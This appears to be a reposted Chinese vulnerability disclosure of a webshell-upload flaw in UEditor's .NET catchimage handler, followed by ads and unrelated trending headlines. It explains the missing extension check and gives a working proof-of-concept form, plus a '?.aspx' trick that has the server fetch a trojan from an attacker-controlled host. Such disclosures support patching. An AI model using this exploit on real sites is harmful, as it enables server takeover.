最新版本UEditor .net getshell
- 发布时间:2018-08-03
- 公开时间:2018-08-21
- 漏洞类型:逻辑漏洞
- 危害等级:高
- 漏洞编号:xianzhi-2018-08-16052905(不收取 驳回)
- 测试版本:github最新版
漏洞详情
https://github.com/fex-team/ueditor/blob/dev-1.5.0/net/App_Code/CrawlerHandler.cs Crawler方法对source[]的检查仅仅是一个ContentType if (response.ContentType.IndexOf("image") == -1)
{
State = "Url is not an image";
return this;
}
并没有检查文件扩展名就直接保存到本地 导致getshell
POC:
<form action="http://xx.com/editor/ueditor/net/controller.ashx?action=catchimage" enctype="multipart/form-data" method="POST">
<p>shell addr: <input type="text" name="source[]" /></p>
<input type="submit" value="Submit" />
</form>
shell addr 可以用http://www.xxx.com/xxx.jpg?.aspx的方式使用包含木马的图片(为了使服务器返回的ContentType是image/xxx)
也可以用http://www.xxxx.com/xxx.php?.aspx然后在xxx.php中自己设置ContentType
返回如下
{"state":"SUCCESS","list":[{"state":"SUCCESS","source":"http://www.xxxx.com//upload/Encyclopedias/201808/03/2018080300550278683.png?.aspx","url":"/upload/image/201808/03/6366885698033038502306919.aspx"}]}
关注公众号:拾黑(shiheibook)了解更多
[广告]赞助链接:
四季很好,只要有你,文娱排行榜:https://www.yaopaiming.com/
让资讯触达的更精准有趣:https://www.0xu.cn/

随时掌握互联网精彩
赞助链接
排名
热点
搜索指数
- 1 铭记光荣历史展望美好未来 7904588
- 2 缅北白家致6名中国公民死亡 7809686
- 3 张家界司机用生命救下一车韩国游客 7713568
- 4 怎样看懂防汛高频词 7619585
- 5 “大圣同款”泳衣卖爆了 7521442
- 6 曝杨少华儿子悲伤过度从灵堂被抬出 7426313
- 7 院士预测广东8级地震?官方通报 7330607
- 8 王菲罕开嗓 为女儿首部剧唱主题曲 7234188
- 9 一斤超百元 知了猴怎么就火出圈了 7142370
- 10 父母离婚没人管 小孩商场待着玩手机 7046441